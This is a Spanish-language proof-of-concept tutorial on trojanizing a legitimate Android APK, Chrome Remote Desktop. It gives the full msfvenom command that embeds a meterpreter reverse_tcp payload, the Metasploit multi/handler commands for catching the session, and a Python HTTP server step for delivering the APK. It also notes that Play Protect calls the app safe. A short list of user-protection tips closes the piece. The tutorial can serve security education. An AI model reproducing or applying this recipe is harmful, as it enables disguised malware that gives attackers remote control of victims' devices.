Prueba de Concepto: Creación de una APK Maliciosa a partir de una APK Legitima (Android)
Los dispositivos móviles se han convertido en elementos indispensables, tanto en el ámbito personal como en el profesional, su uso ha alcanzado un gran nivel desplazando a los ordenadores como herramienta informática en muchos entornos, y resulta muy difícil imaginar la realización de las actividades cotidianas sin hacer uso de estos. La utilización permanente y extensiva de estas tecnologías ha convertido a los dispositivos móviles en uno de los objetivos principales de los ciberataques en los últimos años.
Por lo que en esta ocasión vamos a crear un payload dentro de una APK legitima y establecer una sesión meterpreter en metasploit.
Primeramente nos descargamos la APK legítima desde apkmirror, por ejemplo la de Chrome Remote Desktop.
Pasamos la Apk legítima por la herramienta msfvenom, para ello ejecutaremos el siguiente comando:
$ msfvenom -x chromeremotedesktop.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT= 4444 -o chromeremotedesktop_virus.apk
Ahora con metasploit estaremos a la escucha con el multi handler, para ello ejecutaremos los siguientes comandos:
msf6> use /multi/handler
msf6> set payload android/meterpreter/reverse_tcp
msf6> set LHOST 192.168.1.157
msf6> set LPORT 4444
msf6> run
Nos compartimos la APK Maliciosa, para ello ejecutamos el siguiente comando situado en el mismo directorio donde se encuentra dicha APK Maliciosa:
$ python3 -m http.server 8080
Nos la descargamos en el dispositivo Android y la instalamos.
Como se puede comprobar Google Play Protect, nos indica que la "aplicación parece segura".
Cuando abrimos la aplicación en el dispositivo recibiremos una sesión de meterpreter, si introducimos el comando help nos mostrará la siguiente ayuda.
- 1. Descargar aplicaciones de fuentes confiables: Evita descargar aplicaciones de sitios web no oficiales o fuentes desconocidas, ya que estas podrían contener malware.
- 2. Revisar los permisos de las aplicaciones: Antes de instalar una app, verifica los permisos que solicita y asegúrate de que sean necesarios para su funcionamiento. Si una aplicación solicita permisos innecesarios, considera no instalarla o revocar los permisos después de la instalación.
- 3. Mantener el software actualizado: Las actualizaciones del sistema operativo y las aplicaciones suelen incluir parches de seguridad que corrigen vulnerabilidades que podrían ser explotadas por malware.
- 4. Instalar un antivirus: Aunque Android cuenta con medidas de seguridad integradas, un antivirus puede ofrecer una capa adicional de protección analizando aplicaciones y archivos en busca de malware.
- 5. Desactivar la instalación de aplicaciones de fuentes desconocidas: A menos que sea absolutamente necesario, evita activar la opción de instalar aplicaciones desde fuentes desconocidas en la configuración de seguridad del dispositivo.
- 6. Ser precavido con los enlaces sospechosos: No hagas clic en enlaces sospechosos que recibas por correo electrónico, mensajes de texto o redes sociales, ya que podrían llevar a sitios web maliciosos o descargas de malware.
- 7. Leer reseñas y valoraciones de usuarios: Antes de instalar una aplicación, lee las opiniones y valoraciones de otros usuarios para tener una idea de su seguridad y fiabilidad.
- 8. Mantenerse informado sobre las últimas amenazas: Familiarízate con las últimas técnicas utilizadas por los ciberdelincuentes para protegerte de ellas.
- 9. Considerar el uso de una VPN: Una red privada virtual (VPN) puede ayudar a proteger tu privacidad y seguridad al navegar por internet, especialmente en redes Wi-Fi públicas.